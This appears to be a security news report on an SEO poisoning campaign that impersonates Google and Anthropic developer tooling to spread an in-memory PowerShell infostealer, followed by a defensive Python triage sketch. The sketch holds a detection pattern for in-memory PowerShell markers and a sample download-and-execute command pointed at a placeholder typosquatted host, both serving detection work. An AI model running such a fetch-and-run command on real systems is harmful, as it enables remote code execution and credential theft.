What happened
Security researchers at EclecticIQ documented an ongoing SEO poisoning campaign that impersonates developer tooling pages for Google and Anthropic, delivering an information-stealing payload to Windows hosts, according to an EclecticIQ intelligence report published in May 2026 and coverage by Infosecurity Magazine. The initial public flag was posted by independent researcher @g0njxa on April 21, 2026, and EclecticIQ says attacker-controlled domains began appearing in early March 2026. Reporting by EclecticIQ and Infosecurity Magazine describes typosquatted domains and search-engine manipulation used to surface fake installer pages that mimic legitimate AI agent installation flows.
Technical details
EclecticIQ reports the malware executes entirely in memory via PowerShell, targeting Windows endpoints and exfiltrating collected data to an encrypted command-and-control server. The researchers describe broad collection capabilities that include browser-stored credentials and session data for both Chromium-family browsers and Firefox, and extraction of authentication artifacts from collaboration and communication clients. EclecticIQ lists targeted sources of secrets including:
- Slack, Microsoft Teams, Discord, Zoom, Telegram Desktop and others, where session cookies, local state files and DPAPI-protected keys are collected;
- OAuth tokens, CI/CD credentials and corporate VPN details, which EclecticIQ highlights as items of particular interest to financially motivated operators.
EclecticIQ also notes the stealer enables arbitrary remote code execution, providing operators a pathway to hands-on-keyboard intrusions after initial compromise.
Editorial analysis - technical context
Campaigns that impersonate developer tooling and package installers commonly exploit search-ranking manipulation because developer workflows often start with a web search. SEO-poisoning attackers benefit from low-cost domain registration and typosquatting to intercept installs, and in-memory PowerShell loaders are a persistent technique to evade disk-based detection. For practitioners, this pattern increases the importance of reproducible, offline-install workflows for critical developer tools and robust endpoint monitoring for in-memory execution chains.
Context and significance
EclecticIQ frames this campaign as part of a broader trend where financially motivated eCrime actors capitalize on enterprises' adoption of AI developer tooling to reach high-value developer workstations. Reporting cites domain choices including .co.uk, .us.com and .us.org as evidence the campaign may be geographically tailored toward users in the US and UK, per EclecticIQ. Public reporting links the discovery timeline to activity beginning in March 2026 and public disclosure in April and May 2026.
What to watch
Observers should monitor malicious domain takedowns and search-engine remediation, public disclosures from affected platform vendors, and law-enforcement actions targeting infostealer C2 infrastructure. Industry detection signals to follow include spikes in in-memory PowerShell execution correlated with web downloads from newly registered or typosquatted domains, and unexplained OAuth token usage or CI/CD credential attempts after developer workstation browsing activity.
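As an added example (not code from EclecticIQ's report or the cited coverage), the following Python triage sketch works the second detection signal above: it correlates in-memory PowerShell markers in script-block text with the domain the installer was fetched from, scoring hostname labels against the impersonated brands. The brand list, allowlist, domains and log events are constructed placeholders, not indicators from the report.

```python
import re
from urllib.parse import urlparse

# Brands the page says the campaign impersonates; extend with your own tooling vendors.
PROTECTED_BRANDS = ("anthropic", "google")
# Assumed allowlist of the brands' legitimate registrable domains.
ALLOWLIST = {"anthropic.com", "google.com"}
# Tokens typical of in-memory script execution in PowerShell script-block text (Event ID 4104).
IN_MEMORY = re.compile(r"invoke-expression|\biex\b|downloadstring|-encodedcommand|frombase64string", re.I)

def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one- or two-character misspellings of a brand label."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def is_allowlisted(host: str) -> bool:
    return any(host == d or host.endswith("." + d) for d in ALLOWLIST)

def looks_typosquatted(host: str) -> bool:
    """True when a dot- or hyphen-separated label of a non-allowlisted host embeds or closely misspells a brand."""
    if is_allowlisted(host):
        return False
    return any(brand in label or levenshtein(label, brand) <= 2
               for label in re.split(r"[.-]", host.lower()) for brand in PROTECTED_BRANDS)

def triage(events):
    """events: (endpoint, download_url, script_block) tuples; returns (endpoint, domain, reason) alerts."""
    alerts = []
    for endpoint, url, script_block in events:
        domain = (urlparse(url).hostname or "").lower()
        if not IN_MEMORY.search(script_block):
            continue  # no in-memory marker; newly-registered-domain checks need WHOIS and are out of scope
        if looks_typosquatted(domain):
            alerts.append((endpoint, domain, "typosquat + in-memory execution"))
        elif not is_allowlisted(domain):
            alerts.append((endpoint, domain, "in-memory execution from unknown domain"))
    return alerts

# Constructed sample events: the domains are placeholders, not indicators from the report.
SAMPLE_EVENTS = [
    ("dev-ws-01", "https://anthropic-cli-setup.us.com/install.ps1",
     "IEX (New-Object Net.WebClient).DownloadString('https://anthropic-cli-setup.us.com/stage2')"),
    ("dev-ws-02", "https://docs.anthropic.com/setup", "Get-ChildItem ~\\projects | Measure-Object"),
    ("dev-ws-03", "https://internal-mirror.example/tool.ps1", "Invoke-Expression (Get-Content tool.ps1 -Raw)"),
]
```

Running `triage(SAMPLE_EVENTS)` flags the first and third events and leaves the allowlisted, on-disk second one alone.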
Key Points
1. Campaigns impersonating AI developer tooling use SEO poisoning to reach developer workstations, increasing supply-chain risk for software builds.
2. In-memory PowerShell infostealers harvest browser cookies, OAuth tokens and CI/CD credentials, creating rapid paths from workstation compromise to enterprise access.
3. Detection focus should shift to in-memory execution telemetry, suspicious domain registrations, and anomalous OAuth/CI activity following developer searches.
Scoring Rationale
The campaign targets developer tooling to harvest high-value secrets (OAuth tokens, CI/CD credentials), which materially raises enterprise supply-chain and initial-access risk for practitioners. The techniques, SEO poisoning and in-memory PowerShell loaders, are familiar but effective, making the story notable for security teams and DevOps engineers.